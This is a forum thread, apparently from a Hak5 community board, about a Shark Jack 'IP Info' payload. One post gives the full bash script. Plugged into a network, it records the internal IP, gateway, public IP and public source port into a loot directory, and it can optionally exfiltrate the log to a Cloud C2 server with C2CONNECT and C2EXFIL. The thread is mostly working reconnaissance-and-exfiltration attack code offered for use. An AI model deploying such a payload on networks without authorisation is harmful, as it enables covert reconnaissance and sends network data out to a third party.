Darren Kitchen Posted October 24, 2019 Share Posted October 24, 2019 This payload gathers internal and external IP address info, including default gateway, saving the log to the loot directory and optionally exfiltrating the log to Cloud C2 if CLOUDC2=1 https://github.com/hak5/sharkjack-payloads/blob/master/payloads/library/recon/ipinfo/payload.sh 1 Quote Link to comment Share on other sites More sharing options...
flipchart Posted April 1, 2020 Share Posted April 1, 2020 Yey! Thank you @Darren Kitchen, that's about what I wanted to create today. There is just one downside: Many of our Internet providers nowadays are using carrier-grade NAT (https://en.wikipedia.org/wiki/Carrier-grade_NAT) and to really identify the internet connection one also needs to know the source port and the exact time of a connection... I searched for quite some time to find a service actually providing this information and included the Port information into the logging. I am pretty sure that there should be some more reliable way in obtaining this information (like from an API) but currently I can't find any. Any suggestions are Welcome! #!/bin/bash # # Original Payload: IP Info by Hak5Darren # Original Link: https://github.com/hak5/sharkjack-payloads/blob/master/payloads/library/recon/ipinfo/payload.sh # # Description: This payload gathers internal and external IP address info, # including default gateway, saving the log to the loot directory and # optionally exfiltrating the log to Cloud C2 if CLOUDC2=1 # # LED SETUP (Magenta)... Setting logs and waiting for IP address from DHCP # LED ATTACK (Yellow Blink)... Saving IP address information # LED FAIL (Red Blink)... Failed to gather public IP address # LED SPECIAL (Cyan Blink)... Exfiltrating log to Cloud C2 # LED FINISH (Green Fast Blink to Solid)... Payload successful CLOUDC2=0 LOOT_DIR=/root/loot/ipinfo PUBLIC_IP_URL="http://ipinfo.io/ip" function FAIL() { LED FAIL; exit; } LED SETUP # Make log file mkdir -p $LOOT_DIR LOG_FILE="ipinfo_$(find $LOOT_DIR -type f | wc -l).log" LOG="$LOOT_DIR/$LOG_FILE" # Ask for IP address NETMODE DHCP_CLIENT # Wait until Shark Jack has an IP address while ! ifconfig eth0 | grep "inet addr"; do sleep 1; done LED ATTACK # Gather IP info and save log INTERNALIP=$(ifconfig eth0 | grep "inet addr" | awk {'print $2'} | awk -F: {'print $2'}) GATEWAY=$(route | grep default | awk {'print $2'}) PUBLICIP=$(wget --timeout=30 $PUBLIC_IP_URL -qO -) || FAIL PUBLICPORT=$(wget --timeout=30 http://www.dnstools.ch/wie-ist-meine-ip.html -qO - | grep 'Remote Port' | egrep -o '[[:digit:]]{2,5}') echo -e "Date: $(date)\n\ Internal IP Address: $INTERNALIP\n\ Public IP Address: $PUBLICIP\n\ Public Port Number: $PUBLICPORT\n\ Gateway: $GATEWAY\n" >> $LOG # Optionally connect to Cloud C2, wait for connection and exfiltrate loot if [ "$CLOUDC2" = "1" ]; then LED SPECIAL C2CONNECT while ! pgrep cc-client; do sleep 1; done C2EXFIL STRING $LOG IPinfo fi LED FINISH PS: I couldn't find the bash highlighting... Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.